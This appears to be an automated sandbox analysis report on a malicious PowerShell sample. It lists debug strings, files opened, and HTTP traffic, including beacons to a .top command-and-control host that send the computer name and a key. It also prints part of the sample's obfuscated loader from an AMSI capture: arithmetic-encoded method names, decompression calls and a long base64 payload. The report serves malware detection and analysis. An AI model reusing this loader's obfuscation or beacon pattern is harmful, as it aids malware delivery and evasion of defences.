Click to jump to signature section
Source: | Binary string: lib.pdbI source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *on.pdb] source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBC7000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32rogram Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BRfaul/ source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F02F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB6A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?t.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@ source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG |
Source: global traffic | HTTP traffic detected: GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG |
Source: global traffic | HTTP traffic detected: GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$a4j1wlqhkmzgpot67gw9l3qf0madz/$zs0pgc72wrmfea1.php?id=$env:computername&key=$frnyclkgbjpa&s= |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527p |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.55127045448.000001A8EFF40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.55125120725.000001A8EFDE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.coS |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzE |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzE |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrS |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzE |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D9F46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D92E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D939D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $rleh0swqxu8v617.(([system.String]::new(@((466387/(39594168/5688)),(-5580+(8629-(4098510/1395))),(-9468+(22541740/2353)),(4595-4474),(846636/10079),(74814/674)))))( $8o670ckbwifesz9 ) $rleh0swqxu8v617.(([char[]]@((4063-3996),(274212/(24607988/(43313548/(40167372/8988)))),(9863-(11607-1855)),(8285-8170),(8900-(-632+(70543880/(506+6974))))) -join ''))()$ko9qcp4ehnibsyw.(([system.String]::new(@((1291-1224),(180-(390456/(40867728/7536))),(-8193+8304),(9966-(2491+(4820+2540))),(4716-(7490-(13578625/(21291284/(14293-(22446790/2294))))))))))()[byte[]] $o5ilj12fkps9y0b = $8o670ckbwifesz9.(([char[]]@((-8403+(7023+1464)),(3908-(3232+(3034-2469))),(-3452+(1502+(-7240+9255))),(-572+686),(673398/5907),(3073-(17844096/5996)),(37+(7393-7309))) -join ''))() $yvoshkgni4d5ajl=$o5ilj12fkps9y0b return $yvoshkgni4d5ajl}[System.Text.Encoding]::ascii.(([char[]]@((73982/1042),(-1220+1321),(-257+(-8994+(7449+1918))),(3005-(1457+(2364510/1614))),(-3149+3265),(-5438+5552),(2545-(-3255+5695)),(1005620/9142),(1010533/9811)) -join ''))((m0x37uqa16toeih8ljnvspyz9rb "Lup+bHdzbWZgctTxbA5qOwX1wkWkjRgKAdpFBcCJERk8YsuqF/rdgHWCKEhoUdmCoEn/ThL53wK9jJYT71tLeB76Rl89Ca7+t1Kry7jaF1nOGMfSxuSLF4OXgYS1g6C9Fs4okAOPmYvH+e61zpGGBIgFEpSemJCvyKizlaKNgLPn0V4Fx84o8uvt0FsayoTlzLSK81iMEZeGl5LBzIRBO7AkwjmJnBZVR8iNt46qqLWXv48l6oyaJ+0xhN3LxAoEFC6thCrYUIIB6SplAo7+TTmoc9qP11QxLip4H5rCgIr73c9HpLF9015eIl/R2G7XQgQYUYQ0U1bjrg1hH/3QivUtm5rSl7wdnt67zYJaVFFyYIP+RGaLScGxOIsuXwNEK93gNwz8uBeznBtiBE/XnE3MjcupyzxVR9opWgjK1ZqTkeq5yA758po8w1BbHcdXCFzIkJmbElDbnA9dhkPD+JEepbpcdmfewL0FhNapLrDyj8VH5OQf9zQAHmy9qRYML1TCpUzs2ZyOKgQIbF+MiqqRHrDfCNQH38Se9QUY8HOO9Qd5o/7NYzIMQ1NBxc0CpoPk1VFOzpVFvUcSirXqFYDHQLihy2zRSW4rF0Z0ojeh5pKuCLSUCkHMIprF3x6vVooitZE8gKqf/6AGei4HQtoZINedTr6A95sOQVpfUI+2zz1dxHsDPk61XYGEn3E51w3B8cC8UTuwSHMLk7nc6KjF2l4xzRcNHsDGkUvhMFLglt96ojxeqruoDocEDnZ8SvxbTyEYo+vnO9Cu8YfxtgqcpOilZ4TouUM2EQdWOxj7gC0wGNqrTf+UMx3/CJK/z4P8ok41W/Q/G0Z5qilu1tKF/6EDSOK07bMlQ2Gv5D2xnr4rpw2n9X+QN3NiN7aduDypEQacuP3DJV7N6sLdp6CIsKk7roLNrg6SlRGtkta9HGLxDZaQG+scw9fTkOzyVQx+Av5dHdjfLU5VLlzIUIiaiYqd4T6lb385Y44XIbOVtLsLwZ7G+CW4A7z2N5WAjSxXeUoZS7AcJhvmrBG8amgp9i6owxyZp52F6dcVhjtDHcNNFiPFwZbE3Jey4kMD0Omn6UKIhYB+GJwcNS3atmIFRul3CskTRdhJEokTno2jbKAc0sJ5qM3L5ZGgKp+iuO8oL6bCnWoIcR6HIsBHh0Y79zadLbMggJ1vmwoPEZCOkU6Mc7CNOnTbjDtuToz2WpCy/AebixOdraiP6qZZcyrOFt5R1oeFJi6hn6gPccdJWseX31o3GHLieeBagdr6GXIfMgFwCAXUSrLfiEhgC6/oLv/3KXjdKDPiPk+fJ1huU9KNnbh+c79uMmAmg+iOCHopD3rNQV9ACQ |